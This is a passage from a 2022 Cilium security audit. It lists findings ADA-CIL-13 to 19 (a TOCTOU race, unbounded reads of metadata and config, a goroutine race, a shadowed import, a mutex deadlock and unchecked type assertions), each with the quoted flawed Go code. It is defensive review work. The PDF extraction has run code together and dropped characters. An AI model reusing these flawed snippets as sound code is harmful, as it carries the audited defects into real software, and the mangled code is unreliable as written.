2022\npkg/datapath/linux/routing/migrate.go(*migrator).copyRoutesfrom\npkg/datapath/loader/loader.go(*Loader).replaceNetworkDatapathinterfaces\npkg/egressgateway/net.goaddEgressIpRuleegressIP\npkg/ipam/allocator/podcidr/podcidr.gogetCIDRAllocatorsInfonetTypes\npkg/ipam/node_manager.go(*NodeManager).resyncNodectx\npkg/k8s/apis/cilium.io/client/register.gowaitForV1CRDcrdName\npkg/k8s/apis/cilium.io/client/v1beta1.gowaitForV1beta1CRDcrdName\npkg/k8s/identitybackend/identity.go(*crdBackend).getctx\npkg/k8s/identitybackend/identity.go(*crdBackend).getByIdctx\npkg/k8s/watchers/cilium_clusterwide_envoy_config.go(*K8sWatcher).ciliumClusterwideEnvoyConfigInitclientset\npkg/k8s/watchers/endpoint.go(*K8sWatcher).updateK8sEndpointV1oldEP\npkg/k8s/watchers/service.go(*K8sWatcher).updateK8sServiceV1oldSvc\npkg/k8s/watchers/watcher.go(*K8sWatcher).enableK8sWatchersctx\npkg/k8s/watchers/watcher.go(*K8sWatcher).delK8sSVCsse\npkg/monitor/agent/agent.go(*Agent).processPerfRecordscopedLog\npkg/monitor/api/drop.goextendedReasonreason\npkg/monitor/format/format.go(*MonitorFormatter).policyVerdictEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).recorderCaptureEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).logRecordEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).agentEventsprefix\npkg/node/address.gochooseHostIPsToRestoreipv6\npkg/pidfile/pidfile.gokillpidfile\npkg/policy/selectorcache.go(*selectorManager).removeUserdnsProxy\npkg/proxy/dns.go(*dnsRedirect).setRuleswg\nproxylib/proxylib/policymap.gonewPortNetworkPolicyRulesport\n45Cilium security audit, 2022\n13: TOCTOU race condition in sockopsbpftoolLoad\nOverall severity:\nLow\nID:\nADA-CIL-13\nLocation:pkg/sockops\nCWE:\n●\nCWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition\nFix:\nhttps://github.com/cilium/cilium/pull/23606\nDescription\nA TOCTOU race condition exists in sockopsbpftoolLoad\n.\nhttps://github.com/cilium/cilium/blob/473e75f4d49b6e47880833e041c946b5446a145d/pkg/sockops/sockops.go#L100\nfuncbpftoolLoad(bpfObjectstring, bpfFsFilestring)error{...maps, err := os.ReadDir(filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\"))iferr !=nil{returnerr}\nfor_, f :=rangemaps {// Ignore all backing filesifstrings.HasPrefix(f.Name(),\"..\") {continue}\nuse :=func()bool{for_, n :=rangesockopsMaps {iff.Name() == n {returntrue}}returnfalse}()\nif!use {continue}\nmapString := []string{\"map\",\"name\", f.Name(),\"pinned\",filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\", 
f.Name())}mapArgList =append(mapArgList, mapString...)}\nargs := []string{\"-m\",\"prog\",\"load\", bpfObject,bpffs}args =append(args, mapArgList...)log.WithFields(logrus.Fields{\"bpftool\": prog,\"args\": args,}).Debug(\"Load BPF Object:\")out, err := exec.Command(prog, args...).CombinedOutput()\n46Cilium security audit, 2022\niferr !=nil{returnfmt.Errorf(\"Failed to load %s: %s: %s\", bpfObject,err, out)}returnnil}\nIn this API there is a check whether a map should be used. If it should, then the map is referenced\nby name and passed to the bp\u0000ool. A race condition exists in that the map could be replaced a\u0000er\nthe check has occurred and before bp\u0000ool is invoked.\nThe specific part that has the race condition is this:\nuse :=func()bool{for_, n :=rangesockopsMaps {iff.Name() == n {returntrue}}returnfalse}()\nif!use {continue}\nmapString := []string{\"map\",\"name\", f.Name(),\"pinned\",filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\", f.Name())}mapArgList =append(mapArgList, mapString...)\nThe level of exploitability of this issue is low but is included here to highlight that there currently is\nnot a guarantee that the map that Cilium loads is the map that it - or the user - expects to load.\n47Cilium security audit, 2022\n14: Level of trust for input from cloud providers is too high\nOverall severity:\nLow\nID:\nADA-CIL-14\nLocation:\n●pkg/azure\n●pkg/alibabacloud\n●pkg/aws\nCWE:\n●\nCWE-1041: Use of Redundant Code\nFix:\nhttps://github.com/cilium/cilium/pull/22602\nDescription\nWhen Cilium fetches metadata from a 3rd party, Azure IMS, Alibaba Cloud, AWS, the response is\nread entirely into memory without enforcing an upper limit. Since Cilium does not control the\nbehavior of these 3rd-party APIs, it cannot ensure that the size of the response will always be\nwithin reasonable limits. 
If an attacker finds a way to generate a response that contains a large\nbody, a Denial-of-Service scenario would exist, when Cilium reads the entire response into\nmemory.\nThe scenario exists the following places:\nAzure IMS\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/azure/ap\ni/metadata.go#L39\nfuncgetMetadataString(ctx context.Context, pathstring)(string, error) {client := &http.Client{Timeout: time.Second *10,}url := fmt.Sprintf(\"%s/%s\", metadataURL, path)req, err := http.NewRequestWithContext(ctx, http.MethodGet, url,nil)iferr !=nil{return\"\",nil}\nquery := req.URL.Query()query.Add(\"api-version\", metadataAPIVersion)query.Add(\"format\",\"text\")\nreq.URL.RawQuery = query.Encode()req.Header.Add(\"Metadata\",\"true\")\nresp, err := client.Do(req)iferr !=nil{return\"\", err}deferfunc() {\n48Cilium security audit, 2022\niferr := resp.Body.Close(); err !=nil{log.WithError(err).Errorf(\"Failed to close bodyfor request %s\",url)}}()\nrespBytes, err := io.ReadAll(resp.Body)iferr !=nil{return\"\", err}\nreturnstring(respBytes),nil}\nAlibaba Cloud\nhttps://github.com/cilium/cilium/blob/181b030b0dd868091cc00d0bd8b1ce40688d63ae/pkg/aliba\nbacloud/metadata/metadata.go#L50\nfuncgetMetadata(ctx context.Context, pathstring)(string, error) {client := &http.Client{Timeout: time.Second *10,}url := fmt.Sprintf(\"%s/%s\", metadataURL, path)req, err := http.NewRequestWithContext(ctx, http.MethodGet, url,nil)iferr !=nil{return\"\", err}\nresp, err := client.Do(req)iferr !=nil{return\"\", err}\nifresp.StatusCode != http.StatusOK {return\"\", fmt.Errorf(\"metadata service returnedstatus code %d\",resp.StatusCode)}\ndeferresp.Body.Close()respBytes, err := io.ReadAll(resp.Body)iferr !=nil{return\"\", err}\nreturnstring(respBytes),nil}\nAWS\nhttps://github.com/cilium/cilium/blob/c5cbf403dbe355ecbb80dfc8d7a8ed4da45c43bd/pkg/aws/\nmetadata/metadata.go#L24\nfuncgetMetadata(client *imds.Client, pathstring)(string, error) {res, err := client.GetMetadata(context.TODO(), &imds.GetMetadataInput{Path: path,\n49Cilium security audit, 2022\n})iferr !=nil{return\"\", fmt.Errorf(\"unable to retrieve AWS metadata%s: %w\", path, err)}\ndeferres.Content.Close()value, err := io.ReadAll(res.Content)iferr !=nil{return\"\", fmt.Errorf(\"unable to read response contentfor AWS metadata%q: %w\", path, err)}\nreturnstring(value), err}\n50Cilium security audit, 2022\n15: BGP configuration file is read entirely into memory\nOverall severity\nLow\nID:\nADA-CIL-15\nLocation:pkg/bgp\nCWE:\n●\nCWE-1041: Use of Redundant Code\nFix:\nhttps:/ /github.com/cilium/cilium/pull/22602\nDescription\nThe BGP config parser reads a config file entirely into memory. 
This could create a scenario\nwhereby a malicious user intentionally - or a genuine user unintentionally - could parse a config file\nthat is larger than the available memory on the memory creating Denial-of-Service of the machine.\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/bgp/conf\nig/config.go#L16\nfuncParse(r io.Reader) (*metallbcfg.Config, error){buf, err := io.ReadAll(r)iferr !=nil{returnnil, fmt.Errorf(\"failed to read MetalLB config:%w\", err)}config, err := metallbcfg.Parse(buf)iferr !=nil{returnnil, fmt.Errorf(\"failed to parse MetalLBconfig: %w\", err)}returnconfig,nil}\n51Cilium security audit, 2022\n16: Race condition when starting operator apiserver\nOverall severity:\nLow\nID:\nADA-CIL-16\nLocation:\nOperator apiserver\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nDescription\nA race condition exists when starting the oprerator apiserver.StartServer()\nloops through all\naddresses ins.listenAddres\nand starts a goroutine\nin each iteration. Each goroutine refers to\naddr which is not passed to the goroutine. As such, the addr in each goroutine may not be the addr\nof the given loop iteration.\nThis is purely a cosmetic issue with the highest impact of causing confusion when going through\nthe logs.\nfunc(s *Server)StartServer()error{errs :=make(chanerror,1)nServers :=0\n// Since we are opening this on localhost only, weneed to make sure// we can open for both v4 and v6 localhost. In casethe user is running// v4-only or v6-only.for_,addr:=ranges.listenAddrs {ifaddr ==\"\"{continue}nServers++\nmux := http.NewServeMux()\n// Index handler is the the handler for Open-APIrouter.mux.Handle(\"/\", s.Server.GetHandler())// Create a custom handler for /healthz as an aliasto /v1/healthz. A httpmux// is required for this because open-api spec doesnot allow multiple basepaths// to be specified.mux.HandleFunc(\"/healthz\",func(rw http.ResponseWriter,_ *http.Request) {resp := s.healthzHandler.Handle(operator.GetHealthzParams{})resp.WriteResponse(rw, runtime.TextProducer())})\nsrv := &http.Server{Addr: addr,Handler: mux,}\n52Cilium security audit, 2022\nerrCh :=make(chanerror,1)\nlc := net.ListenConfig{Control: setsockoptReuseAddrAndPort}ln, err := lc.Listen(context.Background(),\"tcp\",addr)iferr !=nil{log.WithError(err).Fatalf(\"Unable to listen on%s for healthzapiserver\", addr)}\ngofunc() {err := srv.Serve(ln)iferr !=nil{// If the error is due to the server being shutdown,thensend nil to// the server errors channel.iferrors.Is(err, http.ErrServerClosed) {log.WithField(\"address\",addr).Debug(\"OperatorAPIserver closed\")errs <-nil}else{errCh <- errerrs <- err}}}()\ngofunc() {select{case<-s.shutdownSignal:iferr := srv.Shutdown(context.Background());err !=nil{log.WithError(err).Error(\"apiserver shutdown\")}caseerr := <-errCh:log.WithError(err).Warn(\"Unable to start operatorAPIserver\")}}()\nlog.Infof(\"Starting apiserver on address %s\", addr)}\nvarretErr errorforerr :=rangeerrs {iferr !=nil{retErr = err}\nnServers--ifnServers ==0{returnretErr}}\nreturnnil}\n53Cilium security audit, 2022\n17: Bad code practice: Identical identifier of import and variable\nOverall severity:\nLow\nID:\nADA-CIL-17\nLocation:pkg/egressgateway\nCWE:\n●\nCWE-1109: Use of Same Variable for Multiple Purposes\nDescription\nOverwriting import identifiers could result in undefined behavior and should be avoided. 
In the\nfollowing part of Cilium, a variable is assigned to an identifier that also refers to an imported\npackage.\nhttps://github.com/cilium/cilium/blob/710297f229480bbd4fc52f39ea68a6eeb333c9d4/pkg/egressg\nateway/manager.go#L80\nfunc(manager *Manager)getIdentityLabels(securityIdentityuint32) (labels.Labels, error){identityCtx, cancel := context.WithTimeout(context.Background(),option.Config.KVstoreConnectivityTimeout)defercancel()iferr := manager.identityAllocator.WaitForInitialGlobalIdentities(identityCtx);err !=nil{returnnil, fmt.Errorf(\"failed to wait for initialglobal identities: %v\",err)}\nidentity:= manager.identityAllocator.LookupIdentityByID(identityCtx,identity.NumericIdentity(securityIdentity))ifidentity ==nil{returnnil, fmt.Errorf(\"identity %d not found\",securityIdentity)}returnidentity.Labels,nil}\nWhere this package is imported:github.com/cilium/cilium/pkg/identity\n.\nRecommendations\nChange the variable identifier.\n54Cilium security audit, 2022\n18: Deadlock from locked mutex\nOverall severity:\nMedium\nID:\nADA-CIL-18\nLocation:pkg/envoy\nCWE:\n●\nCWE-667: Improper Locking\nFix:\nhttps://github.com/cilium/cilium/pull/23077\nDescription\nGo has two common tools when dealing with concurrency: Mutual exclusion - also known as\nmutex, and channels. A mutex is a low-level tool to protect against race conditions. A mutex can be\neither locked or unlocked. A mutex can perform two operations: Lock and unlock. Each operation is\natomic, meaning that a process has to wait for a locked process to be unlocked until it itself can\nlock. If a process fails to unlock, other processes may wait for an unlock that does not happen\nresulting in a deadlock.\nCilium has a deadlock error in the envoy package from a missing mutex unlock before returning in\ncase of an invalidlistenerConfig\n:\nhttps://github.com/cilium/cilium/blob/79c6f5725372b52c9877a9bde1249da039948649/pkg/envoy/server.go#L576\niferr := listenerConfig.Validate(); err !=nil{log.Errorf(\"Envoy: Could not validate Listener (%s):%s\", err,listenerConfig.String())return}\nRecommendation\nUnlock thes.mutex\nbefore returning.\n55Cilium security audit, 2022\n19: Possible type confusions\nOverall severity:\nLow\nID:\nADA-CIL-19\nLocation:\nSeveral packages\nCWE:\n●\nCWE-704: Incorrect Type Conversion or Cast\n●\nCWE-843: Access of Resource Using Incompatible Type ('Type \nConfusion')\nDescription\nType confusions occur when a variable is assumed to be of a type that it is not. They are usually\nmore severe in memory-unsafe languages than in memory-safe languages like Go and are\nrecoverable in Go which only rarely makes them critical. However, there have been previous cases\nof type confusions in open source Go source code having security implications such as\nGHSA-qq97-vm5h-rrhg\n. In addition, Cilium has had issues\nin the past with panics from type\nconfusions:\nhttps://github.com/cilium/cilium/pull/171\n.\nIdeally all type assertions should either be checked or a unit test should demonstrate that the given\ncast is safe. Checking all casts would ensure that all casts are safe, but since this may unnecessarily\nbloat the production code base this may not be the best avenue. 
Instead, a unit test could catch\ntype confusions from being introduced from unchecked type assertions when the code base\nchanges.\nBelow we list the type assertions identified during this audit.\nhttps://github.com/cilium/cilium/blob/fd50b8d3b9684e0e88139e5776bd68ef15a344d0/cilium/cmd/bpf_ct_list.go#L122-\nL162\nfuncdumpCt(maps []interface{}, args ...interface{}){entries :=make([]ctmap.CtMapRecord,0)eID := args[0]\nfor_, m :=rangemaps {path, err :=m.(ctmap.CtMap).Path()iferr ==nil{err =m.(ctmap.CtMap).Open()}iferr !=nil{ifos.IsNotExist(err) {msg :=\"Unable to open %s: %s.\"ifeID.(string) !=\"global\"{msg =\"Unable to open %s: %s: please try using\\\"cilium bpf ct list global\\\".\"}fmt.Fprintf(os.Stderr, msg+\" Skipping.\\n\", path,err)continue\n56Cilium security audit, 2022\n}Fatalf(\"Unable to open %s: %s\", path, err)}deferm.(ctmap.CtMap).Close()// Plain output prints immediately, JSON/YAML outputholds until it// collected values from all maps to have one consistentobjectifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := ctmap.CtMapRecord{Key:key.(ctmap.CtKey),Value:*value.(*ctmap.CtEntry)}entries =append(entries, record)}iferr =m.(ctmap.CtMap).DumpWithCallback(callback);err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{doDumpEntries(m.(ctmap.CtMap))}}ifcommand.OutputOption() {iferr := command.PrintOutput(entries); err !=nil{os.Exit(1)}}}\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/cilium/cmd/bpf_ipcache_get.go#L\n52\nv :=value.([]string)iflen(v) ==0{fmt.Printf(\"Unable to retrieve identity for LPMentry %s\\n\", arg)os.Exit(1)}\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/cilium/cmd/bpf_lb_list.go#L71-L8\n8\nparseBackendEntry :=func(key bpf.MapKey, value bpf.MapValue){id :=key.(lbmap.BackendKey).GetID()backendMap[id] = value.DeepCopyMapValue().(lbmap.BackendValue).ToHost()}iferr := lbmap.Backend4MapV3.DumpWithCallbackIfExists(parseBackendEntry);err !=nil{Fatalf(\"Unable to dump IPv4 backends table: %s\",err)}iferr := lbmap.Backend6MapV3.DumpWithCallbackIfExists(parseBackendEntry);err !=nil{Fatalf(\"Unable to dump IPv6 backends table: %s\",err)}\nparseSVCEntry :=func(key bpf.MapKey, value bpf.MapValue){varentrystring\n57Cilium security audit, 2022\nsvcKey :=key.(lbmap.ServiceKey)svcVal :=value.(lbmap.ServiceValue).ToHost()svc := svcKey.String()svcKey = svcKey.ToHost()\nhttps://github.com/cilium/cilium/blob/fd50b8d3b9684e0e88139e5776bd68ef15a344d0/cilium/cmd/bpf_nat_list.go#L60-\nL68\nifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := nat.NatMapRecord{Key:key.(nat.NatKey),Value:value.(nat.NatEntry)}entries =append(entries, record)}iferr =m.(nat.NatMap).DumpWithCallback(callback);err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{out, err :=m.(nat.NatMap).DumpEntries()\nhttps://github.com/cilium/cilium/blob/e4d9dd21cfcb396bfe38893547bfe6ed578f7292/cilium/cmd/bpf_recorder_list.go#\nL57-L65\nifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := recorder.MapRecord{Key:key.(recorder.RecorderKey), Value:value.(recorder.RecorderEntry)}entries =append(entries, record)}iferr = m.DumpWithCallback(callback); err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{\nhttps://github.com/cilium/cilium/blob/677750f8a3f098be7da6bb7b5a94c240e6633b36/operator/cmd/cilium_node.go#L\n328\nif_, ok := key.(ciliumNodeManagerQueueSyncedKey);ok 
{close(s.ciliumNodeManagerQueueSynced)returntrue}\nerr := syncHandler(key.(string))iferr ==nil{// If err is nil we can forget it from the queue,if it is not nil// the queue handler will retry to process thiskey until it succeeds.queue.Forget(key)returntrue}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L203\n58Cilium security audit, 2022\nfuncsyncCESsInLocalCache(cesStore cache.Store, manager operations) {for_, obj :=rangecesStore.List() {ces :=obj.(*v2alpha1.CiliumEndpointSlice)// If CES is already cached locally, do nothing.\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L236\nfunc(c *CiliumEndpointSliceController)processNextWorkItem()bool{cKey, quit := c.queue.Get()ifquit {returnfalse}deferc.queue.Done(cKey)\nerr := c.syncCES(cKey.(string))c.handleErr(err, cKey)\nreturntrue}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L278\nobj, exists, err := c.ciliumEndpointSliceStore.GetByKey(key)iferr ==nil&& exists {ces :=obj.(*v2alpha1.CiliumEndpointSlice)// Delete the CES, only if CEP count is zero inlocal copy of CES andapi-server copy of CES,// else Update the CESiflen(ces.Endpoints) ==0&& c.Manager.getCEPCountInCES(key)==0{iferr := c.reconciler.reconcileCESDelete(key);err !=nil{returnerr}}else{iferr := c.reconciler.reconcileCESUpdate(key);err !=nil{returnerr}}}\nhttps://github.com/cilium/cilium/blob/e3dfed84dc69990bbb68e9a181e984ec83dbe233/operator/pkg/gateway-api/contr\noller.go#L191-L222\nfunconlyStatusChanged()predicate.Predicate{option := cmpopts.IgnoreFields(metav1.Condition{},\"LastTransitionTime\")returnpredicate.Funcs{UpdateFunc:func(e event.UpdateEvent)bool{switche.ObjectOld.(type) {case*gatewayv1beta1.GatewayClass:o, _ := e.ObjectOld.(*gatewayv1beta1.GatewayClass)n, ok := e.ObjectNew.(*gatewayv1beta1.GatewayClass)if!ok {returnfalse}\n59Cilium security audit, 2022\nreturn!cmp.Equal(o.Status, n.Status, option)case*gatewayv1beta1.Gateway:o, _ := e.ObjectOld.(*gatewayv1beta1.Gateway)n, ok := e.ObjectNew.(*gatewayv1beta1.Gateway)if!ok {returnfalse}return!cmp.Equal(o.Status, n.Status, option)case*gatewayv1beta1.HTTPRoute:o, _ := e.ObjectOld.(*gatewayv1beta1.HTTPRoute)n, ok := e.ObjectNew.(*gatewayv1beta1.HTTPRoute)if!ok {returnfalse}return!cmp.Equal(o.Status, n.Status, option)default:returnfalse}},}}\nhttps://github.com/cilium/cilium/blob/d0a43aa05ee39b884ff9e87318e2a6aebd5ca98f/operator/pkg/gateway-api/httpro\nute.go#L44-L46\nfunc(rawObj client.Object) []string{hr, ok :=rawObj.(*gatewayv1beta1.HTTPRoute)if!ok {\nhttps://github.com/cilium/cilium/blob/d0a43aa05ee39b884ff9e87318e2a6aebd5ca98f/operator/pkg/gateway-api/httpro\nute.go#L70-L72\nfunc(rawObj client.Object) []string{hr :=rawObj.(*gatewayv1beta1.HTTPRoute)vargateways []string\nhttps://github.com/cilium/cilium/blob/8df3d1e320da86b75f07f65adcd185299a5b6d9c/operator/pkg/lbipam/lbipam.go#\nL398-L401\nfori :=0; i < poolRetryQueue.Len(); i++ {retryInt, _ := poolRetryQueue.Get()retry :=retryInt.(*retry)\nhttps://github.com/cilium/cilium/blob/6c98f152ad9e9d9882bc02840474dd39c04bd1e0/operator/watchers/cilium_endp\noint.go#L200-L204\nif!exists {returnnil,false,nil}cep :=item.(*cilium_api_v2.CiliumEndpoint)returncep, exists,nil\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL71\n60Cilium security audit, 2022\nsuccess := 
checkAndMarkNode(c, nodeGetter,key.(string), mno)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL161\npodInterface, exists, err := ciliumPodsStore.GetByKey(key.(string))\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL170\npod :=podInterface.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/node_taint.go#\nL198\nciliumPod :=ciliumPodInterface.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/af61d36f5f20a7f3b07b8430a400073eb20c411c/operator/watchers/pod.go#L43\npod :=obj.(*slim_corev1.Pod)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/datapath/ipcache/listener.go\n#L192\nk :=key.(*ipcacheMap.Key)\nhttps://github.com/cilium/cilium/blob/e4d68f84a7c957bc9c6b6fea3bfda3151f830629/pkg/datapath/loader/hash.go#L77\nstate, err := d.Hash.(encoding.BinaryMarshaler).MarshalBinary()\nhttps://github.com/cilium/cilium/blob/e4d68f84a7c957bc9c6b6fea3bfda3151f830629/pkg/datapath/loader/hash.go#L82\niferr :=newDatapathHash.(encoding.BinaryUnmarshaler).UnmarshalBinary(state);err !=nil{\nhttps://github.com/cilium/cilium/blob/be6d746ae29fc733bc3a58e2afcc79e77c35485b/pkg/endpoint/policy.go#L607\nregenResult :=result.(*EndpointRegenerationResult)\nhttps://github.com/cilium/cilium/blob/79c6f5725372b52c9877a9bde1249da039948649/pkg/envoy/server.go#L1778\nnetworkPolicy :=res.(*cilium.NetworkPolicy)\nhttps://github.com/cilium/cilium/blob/83f82482f9c831de712a14c9adc72caa0bda3dc3/pkg/envoy/xds/server.go#L274\nreq := recv.Interface().(*envoy_service_discovery.DiscoveryRequest)\nhttps://github.com/cilium/cilium/blob/83f82482f9c831de712a14c9adc72caa0bda3dc3/pkg/envoy/xds/server.go#L387\nresp := recv.Interface().(*VersionedResources)\n61Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/e6ce5c17afc21448fa9e69a7a36eb41814532256/pkg/hubble/relay/queue/priority_\nqueue.go#L48\nresp := heap.Pop(&pq.h).(*observerpb.GetFlowsResponse)\nhttps://github.com/cilium/cilium/blob/e6ce5c17afc21448fa9e69a7a36eb41814532256/pkg/hubble/relay/queue/priority_\nqueue.go#L91\nresp :=x.(*observerpb.GetFlowsResponse)\nhttps://github.com/cilium/cilium/blob/69e4c6974891c161300889596f2029e489dded02/pkg/k8s/init.go#L102\ntypesNode :=nodeInterface.(*slim_corev1.Node)\nhttps://github.com/cilium/cilium/blob/09f72f77b460bfcb0eef09c4552026ec2e45fe65/pkg/k8s/resource/resource.go#L25\n4\nentry :=raw.(queueEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L285\nkey :=k.(CtKey)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L289\nvalue :=v.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L361\nentry :=value.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L445\nentry :=value.(*CtEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/ctmap.go#L599\n-L600\nnatKey :=key.(nat.NatKey)natVal :=value.(nat.NatEntry)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L37\nnatKey :=k.(*nat.NatKey6)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L60\nnatVal 
:=v.(*nat.NatEntry4)\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L78-L7\n9\nnatKey :=k.(*nat.NatKey6)natVal :=v.(*nat.NatEntry6)\n62Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/183726c8da72d899ef9c205bb7f80d1a2577c099/pkg/maps/ctmap/utils.go#L118\nnatKey :=k.(*nat.NatKey6)\nhttps://github.com/cilium/cilium/blob/58e4081c3c2a6e052d7c5e3443be33dd6ae5024b/pkg/maps/egressmap/policy.go\n#L176-L177\nkey :=k.(*EgressPolicyKey4)value :=v.(*EgressPolicyVal4)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L242\nvHost := v.ToHost().(*RevNat4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L288\nkHost := k.ToHost().(*Service4Key)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L342\nsHost := s.ToHost().(*Service4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L452\nvHost := v.ToHost().(*Backend4Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv4.go#L516\nvHost := v.ToHost().(*Backend4ValueV3)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L109\nvHost := v.ToHost().(*RevNat6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L153\nkHost := k.ToHost().(*Service6Key)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L207\nsHost := s.ToHost().(*Service6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/ipv6.go#L316\nvHost := v.ToHost().(*Backend6Value)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L83\nsvcVal := svcKey.NewValue().(ServiceValue)\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L120\nzeroValue := svcKey.NewValue().(ServiceValue)\n63Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L336\nmatchKey := key.DeepCopyMapKey().(*AffinityMatchKey).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L357\nk :=key.(SourceRangeKey).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L430\n-L438\nparseBackendEntries :=func(key bpf.MapKey, valuebpf.MapValue) {backendKey :=key.(BackendKey)backendValue := value.DeepCopyMapValue().(BackendValue).ToHost()backendValueMap[backendKey.GetID()] = backendValue}\nparseSVCEntries :=func(key bpf.MapKey, value bpf.MapValue){svcKey := key.DeepCopyMapKey().(ServiceKey).ToHost()svcValue := value.DeepCopyMapValue().(ServiceValue).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L514\n-L515\nbackendKey :=key.(BackendKey)backendValue := value.DeepCopyMapValue().(BackendValue).ToHost()\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/pkg/maps/lbmap/lbmap.go#L564\nzeroValue := fe.NewValue().(ServiceValue)\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lbmap/source_range.g\no#L52\nkHost := 
